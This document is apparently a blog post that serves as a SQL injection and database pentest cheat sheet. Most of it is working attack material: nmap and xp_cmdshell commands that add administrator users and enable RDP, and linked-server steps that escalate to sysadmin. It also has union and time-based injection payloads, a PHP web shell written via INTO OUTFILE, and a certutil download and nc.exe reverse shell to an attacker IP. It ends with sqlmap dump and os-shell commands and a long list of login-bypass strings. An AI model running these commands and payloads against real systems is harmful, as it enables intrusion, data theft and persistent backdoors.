SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey

2) xp_cmdshell | Red Team tales

3) PentesterMonkey SQL Injection Cheatsheet

   Use dbeaver for GUI Access 

4) SQL Injection Explanation | Graceful Security

Common Ports

Microsoft SQL:
1433/TCP (default listener)
1434/UDP (browser service)
4022/TCP (service broker)
5022/TCP (AlwaysOn High Availability default)
135/TCP (Transaction SQL Debugger)
2383/TCP (Analysis Services)
2382/TCP (SQL Server Browser Service)
500,4500/UDP (IPSec)
137-138/UDP (NetBios / CIFS)
139/TCP (NetBios CIFS)
445/TCP (CIFS)

Oracle SQL:
1521/TCP
1630/TCP
3938/HTTP

MongoDB:
27017,27018,27019/TCP


PostgreSQL:
8432/TCP

MySQL:
3306/TCP

SQL DB Enum with nmap:

nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add"

nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators bhanu /add" 

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.10

MSSQL/MYSQL DB Login Bruteforce

git clone https://github.com/m8r0wn/enumdb.git
cd enumdb 
python3 setup.py install

Download Wordlist from Seclists
cat mssql-betterdefaultpasslist.txt  | cut -f1 -d":" > user.txt
cat mssql-betterdefaultpasslist.txt  | cut -f2 -d":" > pass.txt


#Port is optional
#-t = mysql or mssql; mssql port  1433/1434; mysql port - 3309
# -U = users.txt, -u = username; -P = passwords.txt, -p = password

enumdb -U user.txt -P pass.txt -t mssql --brute 10.10.10.10 -port 1434 -v

SQSH usage:

sqsh -S IP_Address:PORT -u username -p password
EXEC xp_cmdshell 'net users /add bhanu bhanu123'

\go

EXEC xp_cmdshell 'net localgroup administrators bhanu /add'

\go

MssqlClient 

Exploiting From Windows with Explanation - Nikhil Mittal

#Enumeration using Metasploit 
auxiliary(admin/mssql/mssql_enum)  

mssqlclient.py username@10.10.10.10

#Run arbitary commands
xp_cmdshell whoami

#View Version
SELECT @@version

#List Databases
SELECT name FROM master..sysdatabases;
SELECT DB_NAME();

#List Users
SELECT name FROM master..syslogins
SELECT name FROM master..syslogins WHERE sysadmin = '1';

#Current User
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

#Enum Privs
SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

#Show Servername
select @@servername

#Show linked servers
select * from sysservers;   
select name from sysservers;

#Enum Linked Remote Servers
EXECUTE ('select @@servername;') at [hostname\DB_NAME];
EXECUTE ('select suser_name();') at [hostname\DB_NAME];
EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [hostname\DB_NAME];
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [hostname\DB_NAME];

#Find the username from which we can run commands on the server 
EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];

#Check sysadmin accounts on the server/DB
 EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
 
#Check your permissions on the server 
EXECUTE ('SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');') at [COMPATIBILITY\POO_CONFIG];

#Running command as a linked server using the server that we have permissions on 
EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#View the permissions you have on the linked database.
 EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

#Creating a new sa user
#so that we can work easily on the DB that we have permissions on, rather than running as other user multile times

EXECUTE('EXECUTE(''CREATE LOGIN newuser WITH PASSWORD = ''''P@$$w0rd123'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''newuser'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]

#Login as a new user
mssqlclient.py newuser@10.10.10.10
P@$$w0rd123

#List Databases 
SELECT name FROM master..sysdatabases;

#List Objects from a selected database
to QUERY in MSSQL - [server].[db].[schema].[table]
select table_name,table_schema from DB_NAME.INFORMATION_SCHEMA.TABLES;

#Exploiting a Stored Procedure - sp_execute_external_script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';

#Abusing Xpdirtree
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
SQLCMD -S SERVER\Username -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin

ERROR BASED SQL Injection:
============================
website.com/comment.php?id=1'   /Breaks the statement
website.com/comment.php?id=738 order by 1 /Order by first column with reference to select query
website.com/comment.php?id=738 order by 7 /increase the column count, until we get an error
      /This statement broke at 7, so only 6 columns
website.com/comment.php?id=738 union select 1,2,3,4,5,6
  /union all is used to combine 2 or more select statements
  /Where ever output is displayed - it is suitable to enumerate, here 5

website.com/comment.php?id=738 union select 1,2,3,4,@@version,6  /mysql version command

website.com/comment.php?id=738 union select 1,2,3,4,user(),6  /Current user

website.com/comment.php?id=738 union select 1,2,3,4,table_name,6 FROM information_schema.tables
     /Prints all of the table names in the database

website.com/comment.php?id=738 union select 1,2,3,4,column_name,6 FROM information_schema where table_name='users'
     /Extract column names from Table - Ue

website.com/comment.php?id=738 union select 1,2,name,4,password,6 FROM users



ERROR BASED SQL Injection: SQLLITE
==================================

http://localhost:3000/rest/products/search?q=')) union select 1,sqlite_version(),3,4,5,6,7,8,9--;

http://localhost:3000/rest/products/search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,9 FROM sqlite_master--;

search?q=sadsa')) union select sql,sqlite_version(),3,4,5,6,7,8,tbl_name FROM sqlite_master--;           # Get all table names in sqlite_master db

search?q=sadsa')) union select 1,sqlite_version(),3,4,5,6,7,email,password FROM Users--;                 #Get usernames and passwords

TIME BASED SQL INJECTION:
--------------------------
In Time  Based SQL injection - if the query is true - it will wait for the sleep time or else 
executed immediately.

website.com/comment.php?id=738-sleep(5)  /5 Seconds to load
website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0)
    /Executes after 5 seconds -Because the statement is true

website.com/comment.php?id=738-IF(MID(@@version,1,1)='4',SLEEP(5),0) 
    /Executes Immediately - Statement is false


website.com/comment.php?id=738 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
    /Loading a file from the server

website.com/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec(#_GET['cmd']);?>",6 into OUTFILE 'C:/xampp/htdocs/backdoor.php'

website.com/backdoor.php/cmd?ipconfig

SQL Command Injection: MSSQL

bhanu';EXEC Master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\omg.txt';--

admin';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_Address/shell.asp';--

admin';EXEC Master.dbo.xp_cmdshell 'c:\share\nc.exe KALI_IP 9002 -e cmd.exe

sqsh -S IP_ADDRESS:27900 -U sa -L user=sa -L password=password


If xp_cmdshell is disabled:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;



Creating an Admin Account with RDP Access:

aaa';EXEC Master.dbo.xp_cmdshell 'net user /add bhanu bhanu123';--

aaa';EXEC Master.dbo.xp_cmdshell 'net localgroup administrators bhanu /add';--

aaa';EXEC Master.dbo.xp_cmdshell 'reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remoteadmin enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'netsh firewall set service remotedesktop enable';--

aaa';EXEC Master.dbo.xp_cmdshell 'mstsc /console /v:IP_Address';---

NSE Script for XP_CMDSHELL

Bypassing Restriction Interfaces:
----------------------------------
Use Tamper Data Firefox plugin.  /Intercetps Posts requests

start tampter data --> input something inoto input field. or change the items in 
drop down.

SQLMAP:
---------

#Skip a parameter 
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param_Name

#Test only specified parameter
python sqlmap.py -r req.txt --batch --dbms oracle --level 4 --risk 3 --skip Param1,Param2

#Dump All DB dat
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --dump --threads=5

#Get a shell
sqlmap -u http://website.com/commnet.php?id=213 --dbms=mysql --os-shell

sqlmap --help

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"



List all the databases:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --dbs



Current User:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --current-user



Current DB:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --current-db



Tables:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --tables -D owasp10



Columns:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --columns -T accounts -D owasp10



Dump:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 -T accounts -D owasp10 --dump



OS Shell:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --os-shell



SQL Shell:

sqlmap -u 
"http://192.168.149.136/mutillidae/index.php?page=user-info.php&username=admin&password=sadasd&user-info-php-submit-button=View+Account+Details"
 --sql-shell 

current_user()

user()

database()

select tablename from information_schema.table where table_schema = 'owasp10'

Methodology 

1) Check for login pages - try all special characters

2) f12 --> run the page; check for any search functionality like search?q= or id=1?; something like that

Cheatsheet

admin' or 1=1; --
admin' OR 1=1 -- -
search?q='))--;
' or '1'='1
' or 1=1;--
' or 1=1;#
') or ('x'='x
' or like '%';--
' or 1=1 LIMIT 1;--

USERNAME: ' or 1/*
PASSWORD: */ =1 --

USERNAME: admin' or 'a'='a
PASSWORD '#

If the database is mysql, try to dump all login info to files?

Mysql '*'
'&'
'^'
'-'
' or true;--
' or 1;--

union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Steinz Security

Search This Blog

SQL DB & SQL Injection Pentest Cheat Sheet

MssqlClient

Labels

Comments

Post a Comment

Popular posts from this blog

Windows Priv Escallation

Forensics & Crypto